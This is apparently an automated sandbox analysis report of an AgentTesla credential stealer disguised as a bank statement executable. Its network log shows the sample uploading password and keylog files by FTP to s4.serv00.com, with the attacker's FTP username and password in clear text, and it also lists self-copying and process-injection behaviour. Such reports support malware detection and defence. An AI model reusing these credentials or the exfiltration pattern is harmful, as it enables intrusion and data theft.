Oct 30, 2024 05:28:54.973469973 CET	1.1.1.1	192.168.2.4	0x3ce5	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 30, 2024 05:28:56.562475920 CET	1.1.1.1	192.168.2.4	0xf14f	No error (0)	s4.serv00.com	213.189.52.181	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.74.152	443	7568	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 04:28:55 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-30 04:28:55 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 04:28:55 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8da8a9505aa9e9a0-DFW
2024-10-30 04:28:55 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 Data Ascii: 173.254.250.78

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	172.67.74.152	443	7968	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 04:29:10 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-30 04:29:10 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 04:29:10 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8da8a9aa3c963aaf-DFW
2024-10-30 04:29:10 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 Data Ascii: 173.254.250.78

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49747	172.67.74.152	443	7320	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 04:29:18 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-30 04:29:19 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 04:29:19 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8da8a9e17ec82e6c-DFW
2024-10-30 04:29:19 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 Data Ascii: 173.254.250.78

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 30, 2024 05:28:57.324274063 CET	21	49733	213.189.52.181	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:28. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:28. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:28. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Oct 30, 2024 05:28:57.324632883 CET	49733	21	192.168.2.4	213.189.52.181	USER f2241_dol
Oct 30, 2024 05:28:57.585655928 CET	21	49733	213.189.52.181	192.168.2.4	331 User f2241_dol OK. Password required
Oct 30, 2024 05:28:57.586002111 CET	49733	21	192.168.2.4	213.189.52.181	PASS Doll900#@
Oct 30, 2024 05:28:57.916445017 CET	21	49733	213.189.52.181	192.168.2.4	230 OK. Current restricted directory is /
Oct 30, 2024 05:28:58.183074951 CET	21	49733	213.189.52.181	192.168.2.4	504 Unknown command
Oct 30, 2024 05:28:58.185724020 CET	49733	21	192.168.2.4	213.189.52.181	PWD
Oct 30, 2024 05:28:58.447448015 CET	21	49733	213.189.52.181	192.168.2.4	257 "/" is your current location
Oct 30, 2024 05:28:58.447632074 CET	49733	21	192.168.2.4	213.189.52.181	TYPE I
Oct 30, 2024 05:28:58.709135056 CET	21	49733	213.189.52.181	192.168.2.4	200 TYPE is now 8-bit binary
Oct 30, 2024 05:28:58.709364891 CET	49733	21	192.168.2.4	213.189.52.181	PASV
Oct 30, 2024 05:28:58.971010923 CET	21	49733	213.189.52.181	192.168.2.4	227 Entering Passive Mode (213,189,52,181,248,26)
Oct 30, 2024 05:28:58.978390932 CET	49733	21	192.168.2.4	213.189.52.181	STOR PW_user-675052_2024_10_30_00_28_55.html
Oct 30, 2024 05:28:59.733849049 CET	21	49733	213.189.52.181	192.168.2.4	150 Accepted data connection
Oct 30, 2024 05:28:59.997594118 CET	21	49733	213.189.52.181	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.264 seconds (measured here), 1.29 Kbytes per second
Oct 30, 2024 05:29:11.418526888 CET	21	49739	213.189.52.181	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:29. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:29. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Oct 30, 2024 05:29:11.425230026 CET	49739	21	192.168.2.4	213.189.52.181	USER f2241_dol
Oct 30, 2024 05:29:11.684963942 CET	21	49739	213.189.52.181	192.168.2.4	331 User f2241_dol OK. Password required
Oct 30, 2024 05:29:11.685108900 CET	49739	21	192.168.2.4	213.189.52.181	PASS Doll900#@
Oct 30, 2024 05:29:12.016350985 CET	21	49739	213.189.52.181	192.168.2.4	230 OK. Current restricted directory is /
Oct 30, 2024 05:29:12.275110006 CET	21	49739	213.189.52.181	192.168.2.4	504 Unknown command
Oct 30, 2024 05:29:12.275356054 CET	49739	21	192.168.2.4	213.189.52.181	PWD
Oct 30, 2024 05:29:12.534187078 CET	21	49739	213.189.52.181	192.168.2.4	257 "/" is your current location
Oct 30, 2024 05:29:12.534358978 CET	49739	21	192.168.2.4	213.189.52.181	TYPE I
Oct 30, 2024 05:29:12.794436932 CET	21	49739	213.189.52.181	192.168.2.4	200 TYPE is now 8-bit binary
Oct 30, 2024 05:29:12.794589996 CET	49739	21	192.168.2.4	213.189.52.181	PASV
Oct 30, 2024 05:29:13.053359032 CET	21	49739	213.189.52.181	192.168.2.4	227 Entering Passive Mode (213,189,52,181,250,246)
Oct 30, 2024 05:29:13.059572935 CET	49739	21	192.168.2.4	213.189.52.181	STOR PW_user-675052_2024_10_30_00_29_09.html
Oct 30, 2024 05:29:13.813601971 CET	21	49739	213.189.52.181	192.168.2.4	150 Accepted data connection
Oct 30, 2024 05:29:14.081770897 CET	21	49739	213.189.52.181	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.268 seconds (measured here), 1.27 Kbytes per second
Oct 30, 2024 05:29:20.890022039 CET	21	49748	213.189.52.181	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:29. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:29. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Oct 30, 2024 05:29:20.890248060 CET	49748	21	192.168.2.4	213.189.52.181	USER f2241_dol
Oct 30, 2024 05:29:21.146019936 CET	21	49748	213.189.52.181	192.168.2.4	331 User f2241_dol OK. Password required
Oct 30, 2024 05:29:21.146197081 CET	49748	21	192.168.2.4	213.189.52.181	PASS Doll900#@
Oct 30, 2024 05:29:21.474503040 CET	21	49748	213.189.52.181	192.168.2.4	230 OK. Current restricted directory is /
Oct 30, 2024 05:29:21.735243082 CET	21	49748	213.189.52.181	192.168.2.4	504 Unknown command
Oct 30, 2024 05:29:21.735892057 CET	49748	21	192.168.2.4	213.189.52.181	PWD
Oct 30, 2024 05:29:21.991244078 CET	21	49748	213.189.52.181	192.168.2.4	257 "/" is your current location
Oct 30, 2024 05:29:21.991503000 CET	49748	21	192.168.2.4	213.189.52.181	TYPE I
Oct 30, 2024 05:29:22.247018099 CET	21	49748	213.189.52.181	192.168.2.4	200 TYPE is now 8-bit binary
Oct 30, 2024 05:29:22.247889042 CET	49748	21	192.168.2.4	213.189.52.181	PASV
Oct 30, 2024 05:29:22.503412962 CET	21	49748	213.189.52.181	192.168.2.4	227 Entering Passive Mode (213,189,52,181,252,235)
Oct 30, 2024 05:29:22.514823914 CET	49748	21	192.168.2.4	213.189.52.181	STOR PW_user-675052_2024_10_30_00_29_18.html
Oct 30, 2024 05:29:23.263711929 CET	21	49748	213.189.52.181	192.168.2.4	150 Accepted data connection
Oct 30, 2024 05:29:23.525142908 CET	21	49748	213.189.52.181	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.261 seconds (measured here), 1.30 Kbytes per second
Oct 30, 2024 05:30:24.753387928 CET	49733	21	192.168.2.4	213.189.52.181	PASV
Oct 30, 2024 05:30:25.014439106 CET	21	49733	213.189.52.181	192.168.2.4	227 Entering Passive Mode (213,189,52,181,249,85)
Oct 30, 2024 05:30:25.029051065 CET	49733	21	192.168.2.4	213.189.52.181	STOR KL_user-675052_2024_11_12_22_03_39.html
Oct 30, 2024 05:30:25.807862043 CET	21	49733	213.189.52.181	192.168.2.4	150 Accepted data connection
Oct 30, 2024 05:30:26.080961943 CET	21	49733	213.189.52.181	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.273 seconds (measured here), 1.04 Kbytes per second

Target ID:	0
Start time:	00:28:53
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"
Imagebase:	0x2a0000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:28:53
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"
Imagebase:	0xa0000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:28:53
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"
Imagebase:	0x380000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:28:53
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"
Imagebase:	0xc40000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4106544369.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:29:07
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xb80000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:29:07
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x90000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:29:07
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xd00000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1890171254.000000000321C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:29:16
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x860000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:29:16
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xf10000
File size:	471'040 bytes
MD5 hash:	A528109E5486419098353578BD5E662A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4105974724.000000000345C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	291
Total number of Limit Nodes:	16

Executed Functions

Function 04B9990C Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04B99B4E

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9dfd4e911f607ff220db55edfbe2418cb312fdb6fb757f9d0fe487b690879dd5
Instruction ID: 79c43419fd62845b90a6cab6259069a54409146dcb7a512a94bcd024ca3c92c5
Opcode Fuzzy Hash: 9dfd4e911f607ff220db55edfbe2418cb312fdb6fb757f9d0fe487b690879dd5
Instruction Fuzzy Hash: 2FA149B1D00219DFEF60DFA9C84179DBBF2EF48314F1485A9E818A7240DB74A985CF91

Function 04B99918 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04B99B4E

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 46766510205e4d2c7c2252e856814594c94ebdf0940fe3a2a183aa1bfc1edb5b
Instruction ID: 2bc58281d81be082d7273bc430978136a8f5f0e6a39e27c65a3ec86da685dca3
Opcode Fuzzy Hash: 46766510205e4d2c7c2252e856814594c94ebdf0940fe3a2a183aa1bfc1edb5b
Instruction Fuzzy Hash: CA913AB1D00219DFEF50DFA9C84179DBBF2EF44314F1485A9E818A7250DB74A985CF91

Function 0098B0E8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0098B33E

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ce817bc44f37c6c08442abeda1b5d37afbe6004f9c7a92fd0169bd575634ffee
Instruction ID: a78c1944e1bd10a72c43e4d79a3bac5a049a7b31a4d25b7e74b98d2fedd40035
Opcode Fuzzy Hash: ce817bc44f37c6c08442abeda1b5d37afbe6004f9c7a92fd0169bd575634ffee
Instruction Fuzzy Hash: 57714070A00B458FDB24EF6AD45475ABBF5FF88300F048A2AD48ADBB50D774E949CB91

Function 0098590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009859C9

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 64a1289c1da9e048ca7c35c91f7d86cd573d3369a539a6598458134ad3fbaac3
Instruction ID: 9695d6b2779028e281e78df0662c1f3a96129e2d0a14381aba8c10c67728fa67
Opcode Fuzzy Hash: 64a1289c1da9e048ca7c35c91f7d86cd573d3369a539a6598458134ad3fbaac3
Instruction Fuzzy Hash: 4541E3B0C00619CFDB24DFA9C8847DEBBF5BF48304F6481AAD409AB255DB75694ACF50

Function 04B91264 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04B94371

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 64853591bcf8aaec83255850eb7699b8aa795e99343e53cc2f31f21ade7cb786
Instruction ID: bbc001c525d64853f2ba0483704c855e6fd43c333b364539cca38a7012d2da11
Opcode Fuzzy Hash: 64853591bcf8aaec83255850eb7699b8aa795e99343e53cc2f31f21ade7cb786
Instruction Fuzzy Hash: 444129B5904205DFDB14CFA9C448AAABBF5FB88314F24C4A9D519AB321D374A841CFA0

Function 00984248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009859C9

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 94438551556742c51b68c50470e0d97a70747b98c3b90a6dd921f77e8513d5bd
Instruction ID: b99c5ea8f6102aa9f4a38a0236ff8b6479716e966d5757796c0b346e980f4229
Opcode Fuzzy Hash: 94438551556742c51b68c50470e0d97a70747b98c3b90a6dd921f77e8513d5bd
Instruction Fuzzy Hash: A841C2B0C00719CBDB24DFA9C884B9EBBF5BF48304F65819AD408AB265DB756949CF90

Function 04B99674 Relevance: 1.6, APIs: 1, Instructions: 82
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04B99720

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 708ca63baa8bd2b551df35d3160206871839d03d19f7daf04602fd58737af280
Instruction ID: 606761623a97ed92c295c03bf22e44bf95b28c83b13c2dbb45760fd5be05cd49
Opcode Fuzzy Hash: 708ca63baa8bd2b551df35d3160206871839d03d19f7daf04602fd58737af280
Instruction Fuzzy Hash: F43144B2D002599FDF54CFA9C885BDEBBF0FF48314F10842AE958A7240C778A944CBA0

Function 04B99690 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04B99720

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 34248bd2987c6bf116f5ce8693133534f2f1f201454e565c38db0d9c7b00b102
Instruction ID: 26b0e2145fdfe7c0a63e36475206f66b7ad48aed5ab10f40ff9740edc057c872
Opcode Fuzzy Hash: 34248bd2987c6bf116f5ce8693133534f2f1f201454e565c38db0d9c7b00b102
Instruction Fuzzy Hash: 502127B19003599FCF10CFA9C885BDEBBF5FF48310F108429E959A7250C778A954CBA4

Function 04B99778 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04B99800

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 04b58dff2b7935a681e5f21b1687cd889e2aac3e4e753b9dfd381701ca96c7e3
Instruction ID: 8751fe2b2248317b8a1402c129aa510f7d0706de947ee8a781829648c62ab7c1
Opcode Fuzzy Hash: 04b58dff2b7935a681e5f21b1687cd889e2aac3e4e753b9dfd381701ca96c7e3
Instruction Fuzzy Hash: 912136B1C002499FCF10CFAAC881AEEBBF4FF48320F10842DE958A7250C7389941CBA5

Function 0098AFD4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0098D58E,?,?,?,?,?), ref: 0098D64F

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ff8b5e8bee5d33bba4b675e563006ec6debc8d3ee200114f0de7b0cdd4fd5315
Instruction ID: 9a1dfc0d1d8bf2e4428d4a7c111192ed864f177b792a0f0a1c2f03b42ddea113
Opcode Fuzzy Hash: ff8b5e8bee5d33bba4b675e563006ec6debc8d3ee200114f0de7b0cdd4fd5315
Instruction Fuzzy Hash: A021E4B5901248AFDB10DF9AD584ADEBFF8FB48324F14841AE918A7350D378A950CFA4

Function 0098D5C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0098D58E,?,?,?,?,?), ref: 0098D64F

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0786c522e0e8c46e192f97bc835b0e06719de0d98dacb258bfeded6ca1c333e2
Instruction ID: 568e2666dc95a3c9f066c72cbc6929fbe3c0cd7e8fc89bdc8a42cbe9fe82e71e
Opcode Fuzzy Hash: 0786c522e0e8c46e192f97bc835b0e06719de0d98dacb258bfeded6ca1c333e2
Instruction Fuzzy Hash: 5E21E4B59013589FDB10CF9AD584ADEBFF8FB48324F14841AE918A7350D378A940CFA4

Function 04B990F2 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04B99176

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5f6117dd990faf9d35d2202ee067a4d48d3756a635e9e8dad56519748abb0847
Instruction ID: a9a1d95bb6379d554a14c03c91123c040c1fc395c09028f45f0b175d06565a83
Opcode Fuzzy Hash: 5f6117dd990faf9d35d2202ee067a4d48d3756a635e9e8dad56519748abb0847
